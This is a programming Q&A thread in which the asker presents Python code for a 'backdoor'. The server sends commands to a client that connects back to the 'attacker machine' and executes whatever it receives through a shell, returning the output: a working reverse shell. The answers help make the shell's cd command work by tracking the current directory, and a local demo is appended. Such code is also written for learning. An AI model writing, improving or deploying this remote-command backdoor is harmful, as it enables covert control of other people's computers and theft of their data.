
The backdoor is working successfully so far: the client connects to the server, the server sends the command to the client, and the client sends the information from the command back to the server. But when I use the cd command, the command output is not sent back to the server. Any ideas? Is it the subprocess code in the client?

Here's my Server Code:

    from socket import *
    HOST = 'localhost'                 # '' means bind to all interfaces
    PORT = 443                #  port
    # create our socket handler
    s = socket(AF_INET, SOCK_STREAM)
    # set it so that when we cancel out we can reuse the port
    s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    # bind to interface
    s.bind((HOST, PORT))
    # print we are accepting connections
    print ("Listening on ")
    print (HOST)
    print(PORT)
    # listen for only 10 connections
    s.listen(10)
    # accept connections
    conn, addr = s.accept()
    # print connected by ipaddress
    print 'Connected by', addr

    # receive initial connection
    data = conn.recv(1024)

    while True:
      task = raw_input("Enter the task needed")

      if task == "cmd":
          # start loop
          while True:
              command = raw_input("Enter shell command or quit: ")
              # send shell command
              conn.send(command)
              # receive output from linux command
              data = conn.recv(1024)
              # print the output of the linux command
              print data
              # if we specify quit then break out of loop and close socket

              if command == "quit": break

    # close socket
    conn.close()

The Client Code:

    import socket,subprocess
    HOST = 'localhost'    # The remote host
    PORT = 443            # The same port as used by the server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # connect to attacker machine
    s.connect((HOST, PORT))
    # send we are connected
    s.send("Connection Established!")
    while True:
         # receive shell command
         data = s.recv(1024)
         # do shell command
         proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
         # read output
         stdout_value = proc.stdout.read() + proc.stderr.read()
         # send output to attacker
         s.send(stdout_value)

         # if it's quit, then break out and close socket
         if data == "quit": break
    # close socket
    s.close()
ArK
Stegzy
  • Maybe this question helps http://stackoverflow.com/q/21406887/1741542 – Olaf Dietsche Dec 09 '16 at 21:57
  • The `cd` command doesn't have any output. Remember, if you `cd` in a subprocess shell, that change is only for the duration of the subprocess and isn't permanent for the parent process or any future subprocesses. – tdelaney Dec 09 '16 at 22:05
  • Thanks, how would you say I should go about adding a cd command option? – Stegzy Dec 09 '16 at 22:09

2 Answers


Keep track of current directory separately and use it with your subprocess calls. I split the command processor out into a separate function that returns command output or None to quit. I took a wild guess and return the current directory on the cd command... you can change that as you like.

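    import re
    import os
    import subprocess

    current_path = '.'

    def run_command(data):
        global current_path
        if data.startswith("cd "):
            # split on whitespace (not \w+) to get the argument after "cd"
            target = re.split(r'\s+', data, 1)[1]
            # resolve relative to the tracked directory; an absolute target replaces it
            current_path = os.path.join(current_path, target)
            return os.path.realpath(current_path) # what do you want to return here?
        elif data == "quit":
            return None  # check this in main program to quit
        else:
            # run in the tracked directory instead of the process's own cwd
            proc = subprocess.Popen(data, shell=True, cwd=current_path,
                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                stdin=subprocess.PIPE)
            out, err = proc.communicate()
            return out + err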
tdelaney

> when I use the cd command the command output is not sent back to the server

That's because the cd command produces no output (at least not if successful).

Armali
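The behaviour both answers describe, shown locally with no sockets, as an added example that is not part of the original posts: a `cd` run in its own subprocess prints nothing and does not affect the next subprocess, while a directory tracked by the parent and passed through `cwd=` does carry over. It assumes Python 3 and a POSIX shell; `run`, `Session` and `demo` are hypothetical names, and the temporary directory is constructed sample input.

```python
import os
import subprocess
import tempfile


def run(command, cwd):
    """Run one shell command in `cwd`; return (exit status, combined output)."""
    proc = subprocess.run(command, shell=True, cwd=cwd, text=True,
                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return proc.returncode, proc.stdout


class Session:
    """Hypothetical helper: keeps one working directory across subprocesses."""

    def __init__(self, start):
        self.cwd = os.path.realpath(start)

    def execute(self, line):
        parts = line.split(None, 1)
        if not parts or parts[0] != "cd":
            return run(line, self.cwd)[1]
        # cd is handled in the parent: a chdir made by a child shell dies with it.
        target = os.path.expanduser(parts[1].strip() if len(parts) > 1 else "~")
        new_cwd = os.path.realpath(os.path.join(self.cwd, target))
        if not os.path.isdir(new_cwd):
            return "cd: no such directory: %s\n" % target
        self.cwd = new_cwd
        return ""  # like the shell builtin, a successful cd prints nothing


def demo():
    """Constructed input: a temporary directory containing one subdirectory."""
    with tempfile.TemporaryDirectory() as root:
        root = os.path.realpath(root)
        os.mkdir(os.path.join(root, "sub"))
        # A cd run in its own subprocess: no output, next subprocess unaffected.
        cd_output = run("cd sub", root)[1]
        child_cd_lost = run("pwd -P", root)[1].strip() == root
        # The same cd tracked by the parent and passed on through cwd=.
        session = Session(root)
        session.execute("cd sub")
        tracked = session.execute("pwd -P").strip() == os.path.join(root, "sub")
        missing = session.execute("cd nope")
        return cd_output, child_cd_lost, tracked, missing


if __name__ == "__main__":
    print(demo())
```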